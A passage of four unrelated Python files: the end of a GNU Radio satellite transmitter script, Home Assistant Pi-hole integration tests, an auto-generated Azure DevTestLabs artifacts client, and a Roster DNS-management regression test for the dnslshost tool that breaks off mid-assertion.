self.blocks_multiply_const_vxx_0 = blocks.multiply_const_vcc((bb_gain, ))
self.analog_random_source_x_0 = blocks.vector_source_b(map(int, numpy.random.randint(0, 1, 768)), True)
##################################################
# Connections
##################################################
self.msg_connect((self.blocks_socket_pdu_0, 'pdus'), (self.vtgs_ao40_encoder_0, 'in'))
self.connect((self.analog_random_source_x_0, 0), (self.blocks_stream_mux_0, 0))
self.connect((self.blocks_multiply_const_vxx_0, 0), (self.uhd_usrp_sink_0, 0))
self.connect((self.blocks_pack_k_bits_bb_0, 0), (self.digital_dxpsk_mod_0, 0))
self.connect((self.blocks_stream_mux_0, 0), (self.digital_map_bb_0, 0))
self.connect((self.digital_dxpsk_mod_0, 0), (self.blocks_multiply_const_vxx_0, 0))
self.connect((self.digital_map_bb_0, 0), (self.vtgs_mult_scrambler_0, 0))
self.connect((self.vtgs_ao40_encoder_0, 0), (self.blocks_stream_mux_0, 1))
self.connect((self.vtgs_mult_scrambler_0, 0), (self.blocks_pack_k_bits_bb_0, 0))
def get_addr(self):
return self.addr
def set_addr(self, addr):
self.addr = addr
def get_alpha(self):
return self.alpha
def set_alpha(self, alpha):
self.alpha = alpha
def get_bb_gain(self):
return self.bb_gain
def set_bb_gain(self, bb_gain):
self.bb_gain = bb_gain
self.blocks_multiply_const_vxx_0.set_k((self.bb_gain, ))
def get_port(self):
return self.port
def set_port(self, port):
self.port = port
def get_samp_rate(self):
return self.samp_rate
def set_samp_rate(self, samp_rate):
self.samp_rate = samp_rate
self.uhd_usrp_sink_0.set_samp_rate(self.samp_rate)
def get_samps_per_symb(self):
return self.samps_per_symb
def set_samps_per_symb(self, samps_per_symb):
self.samps_per_symb = samps_per_symb
def get_tx_correct(self):
return self.tx_correct
def set_tx_correct(self, tx_correct):
self.tx_correct = tx_correct
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def get_tx_freq(self):
return self.tx_freq
def set_tx_freq(self, tx_freq):
self.tx_freq = tx_freq
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def get_tx_gain(self):
return self.tx_gain
def set_tx_gain(self, tx_gain):
self.tx_gain = tx_gain
self.uhd_usrp_sink_0.set_gain(self.tx_gain, 0)
def get_tx_offset(self):
return self.tx_offset
def set_tx_offset(self, tx_offset):
self.tx_offset = tx_offset
self.uhd_usrp_sink_0.set_center_freq(uhd.tune_request(self.tx_freq+self.tx_correct, self.tx_offset), 0)
def argument_parser():
parser = OptionParser(usage="%prog: [options]", option_class=eng_option)
parser.add_option(
"", "--addr", dest="addr", type="string", default='0.0.0.0',
help="Set addr [default=%default]")
parser.add_option(
"", "--alpha", dest="alpha", type="eng_float", default=eng_notation.num_to_str(0.5),
help="Set alpha [default=%default]")
parser.add_option(
"", "--bb-gain", dest="bb_gain", type="eng_float", default=eng_notation.num_to_str(.5),
help="Set bb_gain [default=%default]")
parser.add_option(
"", "--port", dest="port", type="string", default='52001',
help="Set port [default=%default]")
parser.add_option(
"", "--samp-rate", dest="samp_rate", type="eng_float", default=eng_notation.num_to_str(500e3),
help="Set samp_rate [default=%default]")
parser.add_option(
"", "--samps-per-symb", dest="samps_per_symb", type="eng_float", default=eng_notation.num_to_str(4),
help="Set samps_per_symb [default=%default]")
parser.add_option(
"", "--tx-correct", dest="tx_correct", type="eng_float", default=eng_notation.num_to_str(0),
help="Set tx_correct [default=%default]")
parser.add_option(
"", "--tx-freq", dest="tx_freq", type="eng_float", default=eng_notation.num_to_str(2395e6),
help="Set tx_freq [default=%default]")
parser.add_option(
"", "--tx-gain", dest="tx_gain", type="eng_float", default=eng_notation.num_to_str(20),
help="Set tx_gain [default=%default]")
parser.add_option(
"", "--tx-offset", dest="tx_offset", type="eng_float", default=eng_notation.num_to_str(50e3),
help="Set tx_offset [default=%default]")
return parser
def main(top_block_cls=tx_scram_sock, options=None):
if options is None:
options, _ = argument_parser().parse_args()
tb = top_block_cls(addr=options.addr, alpha=options.alpha, bb_gain=options.bb_gain, port=options.port, samp_rate=options.samp_rate, samps_per_symb=options.samps_per_symb, tx_correct=options.tx_correct, tx_freq=options.tx_freq, tx_gain=options.tx_gain, tx_offset=options.tx_offset)
tb.start()
try:
raw_input('Press Enter to quit: ')
except EOFError:
pass
tb.stop()
tb.wait()
if __name__ == '__main__':
main()
| |
"""Test pi_hole component."""
import logging
from hole.exceptions import HoleError
from homeassistant.components import pi_hole, switch
from homeassistant.components.pi_hole.const import (
CONF_LOCATION,
DEFAULT_LOCATION,
DEFAULT_NAME,
DEFAULT_SSL,
DEFAULT_VERIFY_SSL,
SERVICE_DISABLE,
SERVICE_DISABLE_ATTR_DURATION,
)
from homeassistant.const import (
ATTR_ENTITY_ID,
CONF_HOST,
CONF_NAME,
CONF_SSL,
CONF_VERIFY_SSL,
)
from homeassistant.setup import async_setup_component
from . import (
SWITCH_ENTITY_ID,
_create_mocked_hole,
_patch_config_flow_hole,
_patch_init_hole,
)
from tests.async_mock import AsyncMock
from tests.common import MockConfigEntry
async def test_setup_minimal_config(hass):
"""Tests component setup with minimal config."""
mocked_hole = _create_mocked_hole()
with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
assert await async_setup_component(
hass, pi_hole.DOMAIN, {pi_hole.DOMAIN: [{"host": "pi.hole"}]}
)
await hass.async_block_till_done()
assert (
hass.states.get("sensor.pi_hole_ads_blocked_today").name
== "Pi-Hole Ads Blocked Today"
)
assert (
hass.states.get("sensor.pi_hole_ads_percentage_blocked_today").name
== "Pi-Hole Ads Percentage Blocked Today"
)
assert (
hass.states.get("sensor.pi_hole_dns_queries_cached").name
== "Pi-Hole DNS Queries Cached"
)
assert (
hass.states.get("sensor.pi_hole_dns_queries_forwarded").name
== "Pi-Hole DNS Queries Forwarded"
)
assert (
hass.states.get("sensor.pi_hole_dns_queries_today").name
== "Pi-Hole DNS Queries Today"
)
assert (
hass.states.get("sensor.pi_hole_dns_unique_clients").name
== "Pi-Hole DNS Unique Clients"
)
assert (
hass.states.get("sensor.pi_hole_dns_unique_domains").name
== "Pi-Hole DNS Unique Domains"
)
assert (
hass.states.get("sensor.pi_hole_domains_blocked").name
== "Pi-Hole Domains Blocked"
)
assert hass.states.get("sensor.pi_hole_seen_clients").name == "Pi-Hole Seen Clients"
assert hass.states.get("sensor.pi_hole_ads_blocked_today").state == "0"
assert hass.states.get("sensor.pi_hole_ads_percentage_blocked_today").state == "0"
assert hass.states.get("sensor.pi_hole_dns_queries_cached").state == "0"
assert hass.states.get("sensor.pi_hole_dns_queries_forwarded").state == "0"
assert hass.states.get("sensor.pi_hole_dns_queries_today").state == "0"
assert hass.states.get("sensor.pi_hole_dns_unique_clients").state == "0"
assert hass.states.get("sensor.pi_hole_dns_unique_domains").state == "0"
assert hass.states.get("sensor.pi_hole_domains_blocked").state == "0"
assert hass.states.get("sensor.pi_hole_seen_clients").state == "0"
assert hass.states.get("binary_sensor.pi_hole").name == "Pi-Hole"
assert hass.states.get("binary_sensor.pi_hole").state == "off"
async def test_setup_name_config(hass):
"""Tests component setup with a custom name."""
mocked_hole = _create_mocked_hole()
with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
assert await async_setup_component(
hass,
pi_hole.DOMAIN,
{pi_hole.DOMAIN: [{"host": "pi.hole", "name": "Custom"}]},
)
await hass.async_block_till_done()
assert (
hass.states.get("sensor.custom_ads_blocked_today").name
== "Custom Ads Blocked Today"
)
async def test_switch(hass, caplog):
"""Test Pi-hole switch."""
mocked_hole = _create_mocked_hole()
with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
assert await async_setup_component(
hass,
pi_hole.DOMAIN,
{pi_hole.DOMAIN: [{"host": "pi.hole1", "api_key": "1"}]},
)
await hass.async_block_till_done()
await hass.services.async_call(
switch.DOMAIN,
switch.SERVICE_TURN_ON,
{"entity_id": SWITCH_ENTITY_ID},
blocking=True,
)
mocked_hole.enable.assert_called_once()
await hass.services.async_call(
switch.DOMAIN,
switch.SERVICE_TURN_OFF,
{"entity_id": SWITCH_ENTITY_ID},
blocking=True,
)
mocked_hole.disable.assert_called_once_with(True)
# Failed calls
type(mocked_hole).enable = AsyncMock(side_effect=HoleError("Error1"))
await hass.services.async_call(
switch.DOMAIN,
switch.SERVICE_TURN_ON,
{"entity_id": SWITCH_ENTITY_ID},
blocking=True,
)
type(mocked_hole).disable = AsyncMock(side_effect=HoleError("Error2"))
await hass.services.async_call(
switch.DOMAIN,
switch.SERVICE_TURN_OFF,
{"entity_id": SWITCH_ENTITY_ID},
blocking=True,
)
errors = [x for x in caplog.records if x.levelno == logging.ERROR]
assert errors[-2].message == "Unable to enable Pi-hole: Error1"
assert errors[-1].message == "Unable to disable Pi-hole: Error2"
async def test_disable_service_call(hass):
"""Test disable service call with no Pi-hole named."""
mocked_hole = _create_mocked_hole()
with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
assert await async_setup_component(
hass,
pi_hole.DOMAIN,
{
pi_hole.DOMAIN: [
{"host": "pi.hole1", "api_key": "1"},
{"host": "pi.hole2", "name": "Custom"},
]
},
)
await hass.async_block_till_done()
await hass.services.async_call(
pi_hole.DOMAIN,
SERVICE_DISABLE,
{ATTR_ENTITY_ID: "all", SERVICE_DISABLE_ATTR_DURATION: "00:00:01"},
blocking=True,
)
await hass.async_block_till_done()
mocked_hole.disable.assert_called_once_with(1)
async def test_unload(hass):
"""Test unload entities."""
entry = MockConfigEntry(
domain=pi_hole.DOMAIN,
data={
CONF_NAME: DEFAULT_NAME,
CONF_HOST: "pi.hole",
CONF_LOCATION: DEFAULT_LOCATION,
CONF_SSL: DEFAULT_SSL,
CONF_VERIFY_SSL: DEFAULT_VERIFY_SSL,
},
)
entry.add_to_hass(hass)
mocked_hole = _create_mocked_hole()
with _patch_config_flow_hole(mocked_hole), _patch_init_hole(mocked_hole):
await hass.config_entries.async_setup(entry.entry_id)
await hass.async_block_till_done()
assert entry.entry_id in hass.data[pi_hole.DOMAIN]
assert await hass.config_entries.async_unload(entry.entry_id)
await hass.async_block_till_done()
assert entry.entry_id not in hass.data[pi_hole.DOMAIN]
| |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class ArtifactsOperations(object):
"""ArtifactsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.devtestlabs.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
lab_name, # type: str
artifact_source_name, # type: str
expand=None, # type: Optional[str]
filter=None, # type: Optional[str]
top=None, # type: Optional[int]
orderby=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.ArtifactList"]
"""List artifacts in a given artifact source.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param artifact_source_name: The name of the artifact source.
:type artifact_source_name: str
:param expand: Specify the $expand query. Example: 'properties($select=title)'.
:type expand: str
:param filter: The filter to apply to the operation. Example: '$filter=contains(name,'myName').
:type filter: str
:param top: The maximum number of resources to return from the operation. Example: '$top=10'.
:type top: int
:param orderby: The ordering expression for the results, using OData notation. Example:
'$orderby=name desc'.
:type orderby: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ArtifactList or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.devtestlabs.models.ArtifactList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ArtifactList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'artifactSourceName': self._serialize.url("artifact_source_name", artifact_source_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
if orderby is not None:
query_parameters['$orderby'] = self._serialize.query("orderby", orderby, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('ArtifactList', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/artifactsources/{artifactSourceName}/artifacts'} # type: ignore
def get(
self,
resource_group_name, # type: str
lab_name, # type: str
artifact_source_name, # type: str
name, # type: str
expand=None, # type: Optional[str]
**kwargs # type: Any
):
# type: (...) -> "_models.Artifact"
"""Get artifact.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param artifact_source_name: The name of the artifact source.
:type artifact_source_name: str
:param name: The name of the artifact.
:type name: str
:param expand: Specify the $expand query. Example: 'properties($select=title)'.
:type expand: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Artifact, or the result of cls(response)
:rtype: ~azure.mgmt.devtestlabs.models.Artifact
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Artifact"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'artifactSourceName': self._serialize.url("artifact_source_name", artifact_source_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Artifact', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/artifactsources/{artifactSourceName}/artifacts/{name}'} # type: ignore
def generate_arm_template(
self,
resource_group_name, # type: str
lab_name, # type: str
artifact_source_name, # type: str
name, # type: str
generate_arm_template_request, # type: "_models.GenerateArmTemplateRequest"
**kwargs # type: Any
):
# type: (...) -> "_models.ArmTemplateInfo"
"""Generates an ARM template for the given artifact, uploads the required files to a storage
account, and validates the generated artifact.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param lab_name: The name of the lab.
:type lab_name: str
:param artifact_source_name: The name of the artifact source.
:type artifact_source_name: str
:param name: The name of the artifact.
:type name: str
:param generate_arm_template_request: Parameters for generating an ARM template for deploying
artifacts.
:type generate_arm_template_request: ~azure.mgmt.devtestlabs.models.GenerateArmTemplateRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ArmTemplateInfo, or the result of cls(response)
:rtype: ~azure.mgmt.devtestlabs.models.ArmTemplateInfo
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ArmTemplateInfo"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2018-09-15"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self.generate_arm_template.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'labName': self._serialize.url("lab_name", lab_name, 'str'),
'artifactSourceName': self._serialize.url("artifact_source_name", artifact_source_name, 'str'),
'name': self._serialize.url("name", name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
body_content = self._serialize.body(generate_arm_template_request, 'GenerateArmTemplateRequest')
body_content_kwargs['content'] = body_content
request = self._client.post(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ArmTemplateInfo', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
generate_arm_template.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DevTestLab/labs/{labName}/artifactsources/{artifactSourceName}/artifacts/{name}/generateArmTemplate'} # type: ignore
| |
#!/usr/bin/python
# Copyright (c) 2009, Purdue University
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice, this
# list of conditions and the following disclaimer in the documentation and/or
# other materials provided with the distribution.
#
# Neither the name of the Purdue University nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Regression test for dnslshost
Make sure you are running this against a database that can be destroyed.
DO NOT EVER RUN THIS TEST AGAINST A PRODUCTION DATABASE.
"""
__copyright__ = 'Copyright (C) 2009, Purdue University'
__license__ = 'BSD'
__version__ = '#TRUNK#'
import os
import sys
import socket
import threading
import time
import getpass
import unittest
import roster_core
import roster_server
from roster_user_tools import roster_client_lib
USER_CONFIG = 'test_data/roster_user_tools.conf'
CONFIG_FILE = 'test_data/roster.conf' # Example in test_data
SCHEMA_FILE = '../roster-core/data/database_schema.sql'
DATA_FILE = 'test_data/test_data.sql'
HOST = u'localhost'
USERNAME = u'sharrell'
PASSWORD = u'test'
KEYFILE=('test_data/dnsmgmt.key.pem')
CERTFILE=('test_data/dnsmgmt.cert.pem')
CREDFILE='%s/.dnscred' % os.getcwd()
EXEC='../roster-user-tools/scripts/dnslshost'
class options(object):
password = u'test'
username = u'sharrell'
server = None
ldap = u'ldaps://ldap.cs.university.edu:636'
credfile = CREDFILE
view_name = None
ip_address = None
target = u'machine1'
ttl = 64
class DaemonThread(threading.Thread):
def __init__(self, config_instance, port):
threading.Thread.__init__(self)
self.config_instance = config_instance
self.port = port
self.daemon_instance = None
def run(self):
self.daemon_instance = roster_server.Server(self.config_instance, KEYFILE,
CERTFILE)
self.daemon_instance.Serve(port=self.port)
class Testdnslshost(unittest.TestCase):
def setUp(self):
def PickUnusedPort():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, 0))
addr, port = s.getsockname()
s.close()
return port
self.config_instance = roster_core.Config(file_name=CONFIG_FILE)
db_instance = self.config_instance.GetDb()
db_instance.CreateRosterDatabase()
data = open(DATA_FILE, 'r').read()
db_instance.StartTransaction()
db_instance.cursor.execute(data)
db_instance.EndTransaction()
db_instance.close()
self.port = PickUnusedPort()
self.server_name = 'https://%s:%s' % (HOST, self.port)
self.daemon_thread = DaemonThread(self.config_instance, self.port)
self.daemon_thread.daemon = True
self.daemon_thread.start()
self.core_instance = roster_core.Core(USERNAME, self.config_instance)
self.password = 'test'
time.sleep(1)
roster_client_lib.GetCredentials(USERNAME, u'test', credfile=CREDFILE,
server_name=self.server_name)
self.core_instance.MakeView(u'test_view')
self.core_instance.MakeView(u'test_view2')
self.core_instance.MakeView(u'test_view3')
self.core_instance.MakeZone(u'reverse_zone', u'master',
u'1.168.192.in-addr.arpa.',
view_name=u'test_view')
self.core_instance.MakeZone(u'forward_zone', u'master',
u'university.edu.',
view_name=u'test_view')
self.core_instance.MakeZone(u'forward_zone', u'master',
u'university.edu.',
view_name=u'test_view3')
self.core_instance.MakeZone(u'reverse_zone', u'master',
u'1.168.192.in-addr.arpa.',
view_name=u'test_view2')
self.core_instance.MakeZone(u'ipv6zone', u'master',
u'8.0.e.f.f.3.ip6.arpa.',
view_name=u'test_view')
self.core_instance.MakeRecord(
u'soa', u'soa1', u'forward_zone',
{u'name_server': u'ns1.university.edu.',
u'admin_email': u'admin.university.edu.',
u'serial_number': 1, u'refresh_seconds': 5,
u'retry_seconds': 5, u'expiry_seconds': 5,
u'minimum_seconds': 5}, view_name=u'test_view')
self.core_instance.MakeRecord(
u'soa', u'soa1', u'forward_zone',
{u'name_server': u'ns1.university.edu.',
u'admin_email': u'admin.university.edu.',
u'serial_number': 1, u'refresh_seconds': 5,
u'retry_seconds': 5, u'expiry_seconds': 5,
u'minimum_seconds': 5}, view_name=u'test_view3')
self.core_instance.MakeRecord(
u'soa', u'soa1', u'reverse_zone',
{u'name_server': u'ns1.university.edu.',
u'admin_email': u'admin.university.edu.',
u'serial_number': 1, u'refresh_seconds': 5,
u'retry_seconds': 5, u'expiry_seconds': 5,
u'minimum_seconds': 5}, view_name=u'test_view')
self.core_instance.MakeRecord(
u'soa', u'soa1', u'reverse_zone',
{u'name_server': u'ns1.university.edu.',
u'admin_email': u'admin.university.edu.',
u'serial_number': 1, u'refresh_seconds': 5,
u'retry_seconds': 5, u'expiry_seconds': 5,
u'minimum_seconds': 5}, view_name=u'test_view2')
self.core_instance.MakeRecord(
u'aaaa', u'host2', u'forward_zone', {u'assignment_ip':
u'4321:0000:0001:0002:0003:0004:0567:89ab'}, view_name=u'test_view')
self.core_instance.MakeRecord(u'a', u'host1', u'forward_zone',
{u'assignment_ip': u'192.168.0.1'},
view_name=u'test_view')
self.core_instance.MakeRecord(u'a', u'host2', u'forward_zone',
{u'assignment_ip': u'192.168.1.11'},
view_name=u'test_view3')
self.core_instance.MakeRecord(u'a', u'host3', u'forward_zone',
{u'assignment_ip': u'192.168.1.5'},
view_name=u'test_view')
self.core_instance.MakeRecord(u'a', u'host4', u'forward_zone',
{u'assignment_ip': u'192.168.1.10'},
view_name=u'test_view')
self.core_instance.MakeRecord(u'a', u'host5', u'forward_zone',
{u'assignment_ip': u'192.168.1.17'},
view_name=u'test_view3')
self.core_instance.MakeRecord(u'a', u'host6', u'forward_zone',
{u'assignment_ip': u'192.168.1.8'},
view_name=u'test_view')
self.core_instance.MakeRecord(u'ptr', u'8',
u'reverse_zone',
{u'assignment_host':
u'host6.university.edu.'},
view_name=u'test_view')
self.core_instance.MakeRecord(u'ptr', u'4',
u'reverse_zone',
{u'assignment_host':
u'host2.university.edu.'},
view_name=u'test_view2')
self.core_instance.MakeRecord(u'ptr', u'5',
u'reverse_zone',
{u'assignment_host':
u'host3.university.edu.'},
view_name=u'test_view')
self.core_instance.MakeRecord(u'ptr', u'10',
u'reverse_zone',
{u'assignment_host':
u'host4.university.edu.'},
view_name=u'test_view2')
self.core_instance.MakeRecord(u'ptr', u'7',
u'reverse_zone',
{u'assignment_host':
u'host5.university.edu.'},
view_name=u'test_view2')
def tearDown(self):
if( os.path.exists(CREDFILE) ):
os.remove(CREDFILE)
def testListSingleIP(self):
self.core_instance.MakeReverseRangeZoneAssignment(u'reverse_zone',
u'192.168.1.0/24')
output = os.popen('python %s cidr --cidr-block 192.168.1.5 --no-header '
'-s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name,
USERNAME, PASSWORD, USER_CONFIG))
lines = output.read()
self.assertEqual(len(lines), 129)
self.assertTrue(
'192.168.1.5 Reverse host3.university.edu reverse_zone test_view\n'
in lines)
self.assertTrue(
'192.168.1.5 Forward host3.university.edu forward_zone test_view\n'
in lines)
output.close()
output = os.popen('python %s cidr --cidr-block 192.168.1.4 '
'-s %s -u %s -p %s --config-file %s --no-header' % (
EXEC, self.server_name,
USERNAME, PASSWORD, USER_CONFIG))
self.assertEqual(output.read(),
'192.168.1.4 Reverse host2.university.edu reverse_zone test_view2\n\n')
output.close()
def testListZone(self):
self.core_instance.MakeReverseRangeZoneAssignment(u'reverse_zone',
u'192.168.1.0/24')
output = os.popen('python %s zone -z forward_zone --no-header '
'-s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
lines = output.read()
self.assertEquals(len(lines), 647)
self.assertTrue(
'4321:0000:0001:0002:0003:0004:0567:89ab Forward host2.university.edu '
'forward_zone test_view\n'
in lines)
self.assertTrue(
'192.168.0.1 Forward host1.university.edu '
'forward_zone test_view\n'
in lines)
self.assertTrue(
'192.168.1.11 Forward host2.university.edu '
'forward_zone test_view3\n'
in lines)
self.assertTrue(
'192.168.1.5 Forward host3.university.edu '
'forward_zone test_view\n'
in lines)
self.assertTrue(
'192.168.1.10 Forward host4.university.edu '
'forward_zone test_view\n'
in lines)
self.assertTrue(
'192.168.1.17 Forward host5.university.edu '
'forward_zone test_view3\n'
in lines)
self.assertTrue(
'192.168.1.8 Forward host6.university.edu '
'forward_zone test_view\n'
in lines)
output.close()
output = os.popen('python %s zone -z forward_zone --no-header '
'-v test_view -s %s -u %s -p %s --config-file %s' % (
EXEC, self.server_name, USERNAME,
PASSWORD, USER_CONFIG))
lines = output.read()
self.assertEquals( len(lines), 461)
self.assertTrue(
'192.168.1.5 Forward host3.university.edu '
'forward_zone test_view\n'
in lines)
self.assertTrue(
'192.168.1.8 Forward host6.university.edu '
'forward_zone test_view\n'
in lines)
self.assertTrue(
'192.168.1.10 Forward host4.university.edu '
'forward_zone test_view\n'
in lines)
self.assertTrue(
'192.168.0.1 Forward host1.university.edu '
'forward_zone test_view\n'
'4321:0000:0001:0002:0003:0004:0567:89ab Forward host2.university.edu '
'forward_zone test_view\n'
'192.168.1.5 Forward host3.university.edu '
'forward_zone test_view\n'
